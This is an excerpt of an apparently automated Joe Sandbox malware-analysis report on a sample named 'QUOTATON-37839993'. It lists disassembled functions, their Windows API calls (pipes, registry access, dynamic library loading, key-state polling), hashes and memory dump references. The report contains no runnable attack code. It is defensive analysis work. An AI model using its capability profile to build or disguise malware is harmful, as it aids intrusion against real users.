                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                                                                      • Instruction ID: dc11096d290093898ae178903075a4fe8ed3b4769cafba95a11289d47092bd07
                                                                      • Opcode Fuzzy Hash: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                                                                      • Instruction Fuzzy Hash: 4821A474650309AFDB20AF29EC05A9AB7F8EF447A4F205629FCA0F72D0DB719954CB50
                                                                      Function 00E66E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E66E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E66ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E66F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                                                                      • Instruction ID: ab9a3af91619195871d1c5ee30e6803f0fe81ef759d24567dfc81b2ea83a98e2
                                                                      • Opcode Fuzzy Hash: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                                                                      • Instruction Fuzzy Hash: 002192795503059FDB209F69EC04A9AB7E8AF45764F200B19F8A0F72D0DB71A950C750
                                                                      Function 00E6AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6ACA8
                                                                      • __swprintf.LIBCMT ref: 00E6ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E8F910), ref: 00E6ACFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      • Opcode ID: 407fc98f8e47b60096f1bc38815a32dde501249c2c6951107a4bbc5226e6c5cc
                                                                      • Instruction ID: 0f04681cb3ddf90f03e205c3bd4eb2d9f05f978688dd30f98526e837b4f51651
                                                                      • Opcode Fuzzy Hash: 407fc98f8e47b60096f1bc38815a32dde501249c2c6951107a4bbc5226e6c5cc
                                                                      • Instruction Fuzzy Hash: C7217430A00109AFCB10DF65D985DEE7BF8FF89314B005469F909BB252DA31EA45CB21
                                                                      Function 00E61142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E61184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E611C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID: @
                                                                      • API String ID: 2875609808-411606354
                                                                      • Opcode ID: f7b7b1f0edee195717a716e4f04ba10627152076fb2fec968138fa86e822d96e
                                                                      • Instruction ID: c2201311fd2031ca708c43346c6345459d1eef3b4911c1bcd5c24b0abff5ab92
                                                                      • Opcode Fuzzy Hash: f7b7b1f0edee195717a716e4f04ba10627152076fb2fec968138fa86e822d96e
                                                                      • Instruction Fuzzy Hash: 98117C31C4262CDBCF019FA5E848AEEBBB8FF0A791F044096EA85B2241CB349554CB91
                                                                      Function 00E61AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E61B19
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: 4cbdb2eee1015ee027adc7c7a2b6229c2dc090618b8bc7e61bbc3a3da423aa18
                                                                      • Instruction ID: 6b4a913ad3da4df3a43df7d8a9131c29e5b227a9ce46afb7bd3bf460a1556117
                                                                      • Opcode Fuzzy Hash: 4cbdb2eee1015ee027adc7c7a2b6229c2dc090618b8bc7e61bbc3a3da423aa18
                                                                      • Instruction Fuzzy Hash: 29115E71940218CFCF00EF94E9928EEB7B4FF65348B5464A9D815B7292EB325D06CB90
                                                                      Function 00E7EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7EDEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      • Opcode ID: 200e8ae750ddcd09046641698fbc85408e3876f184928a57036606c6c063783a
                                                                      • Instruction ID: d893d18ea2a8678859501637f888dd843eb4b71024d2f9b8dcf20255b7cc191c
                                                                      • Opcode Fuzzy Hash: 200e8ae750ddcd09046641698fbc85408e3876f184928a57036606c6c063783a
                                                                      • Instruction Fuzzy Hash: 83814EB16007009FD724EF28C886F6AB7E5AF48714F14D95DFA99AB3D2D770AC408B52
                                                                      Function 00E2541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction ID: 24377278f5ade330d8e725cfae4f9a625c6a4b1b3fb7b8fd32cbc36a9d4078ae
                                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction Fuzzy Hash: 5E51CC72A00B25DBCB249F69FE445AEB7B6AF40325F249729F836B62D0D770DD508B40
                                                                      Function 00E80037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E800FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E80183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00E801AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E801BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      • Opcode ID: 79cb16855b0affd025c20d88e03a2c5f37b1341601e79ee079de02235f82d347
                                                                      • Instruction ID: 2d8d77a04faceba893ae2f2bf9a04b6876a77c4fcc0b58931e9780b02a4ed202
                                                                      • Opcode Fuzzy Hash: 79cb16855b0affd025c20d88e03a2c5f37b1341601e79ee079de02235f82d347
                                                                      • Instruction Fuzzy Hash: 84515C71208304AFD714EF58CC85E6AB7E9FF84314F40992DF599A72A2DB31E948CB52
                                                                      Function 00E7D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E7D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E7D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DA21
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      • Opcode ID: ffadd3d0153caea0fbf252bcca511bc742b8bc511053bba81d7c338ec07de4e9
                                                                      • Instruction ID: 763547299151983dec3567e060bc9d3df7480e5475368098e70dde975156d12b
                                                                      • Opcode Fuzzy Hash: ffadd3d0153caea0fbf252bcca511bc742b8bc511053bba81d7c338ec07de4e9
                                                                      • Instruction Fuzzy Hash: E9510335A04209DFCB00EFA8C8849A9BBF4FF49324B54D065E959BB352D731AD85CF90
                                                                      Function 00E6E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6E687
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6E6B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      • Opcode ID: 309d9e5ab1af3844230967946279ea393e60a0aac48e9d6a9982ddadf2c96e7e
                                                                      • Instruction ID: f2a6b26a274e043c7a5115c247c79d75b7bec4ca820e537dd8e3f04acfd03d58
                                                                      • Opcode Fuzzy Hash: 309d9e5ab1af3844230967946279ea393e60a0aac48e9d6a9982ddadf2c96e7e
                                                                      • Instruction Fuzzy Hash: 4A513D75A00105DFCB05EF64D981AAEBBF5EF09314B1494A5E809BB3A2CB31ED51CF60
                                                                      Function 00E8A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37f63b2ec67eba8112835aaf93fd1b1f9d5a70da6fc8a45dd2c9f4f96a9fd9ba
                                                                      • Instruction ID: abe991bf4ae2faafb60edd1ba4394d19eddce78f58634048b684195a17a6626c
                                                                      • Opcode Fuzzy Hash: 37f63b2ec67eba8112835aaf93fd1b1f9d5a70da6fc8a45dd2c9f4f96a9fd9ba
                                                                      • Instruction Fuzzy Hash: 6A41B275905104AFE724EF68CC48FA9BBA4EB09314F181276F81DB72E1C730AD45DB51
                                                                      Function 00E02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00E02357
                                                                      • ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E02399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 08e17622325d2b07fcf91c080e3ed065236b0c264034a57c8660d51ff0c2e170
                                                                      • Instruction ID: 525801f837447327a2b6abab78866abd67afb6b460192394b4e3775838f29df1
                                                                      • Opcode Fuzzy Hash: 08e17622325d2b07fcf91c080e3ed065236b0c264034a57c8660d51ff0c2e170
                                                                      • Instruction Fuzzy Hash: D6419D3560411AFBCF199F68CC48AE9BBB5BB05324F20535AE929B22E0C7349994DF90
                                                                      Function 00E563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E563E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00E56433
                                                                      • TranslateMessage.USER32(?), ref: 00E5645C
                                                                      • DispatchMessageW.USER32(?), ref: 00E56466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E56475
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      • Opcode ID: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
                                                                      • Instruction ID: 53a551d8f08ee1360d03f8cb9ac25b2515bf930847a3ac3935aab1d063684d68
                                                                      • Opcode Fuzzy Hash: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
                                                                      • Instruction Fuzzy Hash: 063183325006469FDB648FB1DC44FA67BB8BB01306F941975E825E31B1E725A4CDD750
                                                                      Function 00E58A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00E58A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00E58ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E58AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00E58AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E58AF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                                                                      • Instruction ID: d9809994ed73a0f477be0838b7fbb527657164605c114021d86526f48f67f934
                                                                      • Opcode Fuzzy Hash: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                                                                      • Instruction Fuzzy Hash: 5331D171500219EFDF14CF68DA4CA9E3BB5EB04316F10462AF924F71D2C7B09918DB91
                                                                      Function 00E5B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00E5B204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5B221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5B259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5B27F
                                                                      • _wcsstr.LIBCMT ref: 00E5B289
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 08b386d84a5c3abb5cb9a122c1985ebff06a87c9b98567e6d6d5e0d2486069b3
                                                                      • Instruction ID: 6c7ba68d521827ffcbb88b4874b3786f10cbaf9173f1d4ae58654e9ecfe84f00
                                                                      • Opcode Fuzzy Hash: 08b386d84a5c3abb5cb9a122c1985ebff06a87c9b98567e6d6d5e0d2486069b3
                                                                      • Instruction Fuzzy Hash: A421F5352042107BEB155B75AC09E7F7B98DF49711F105529FC09FA1A1EF619C4497A0
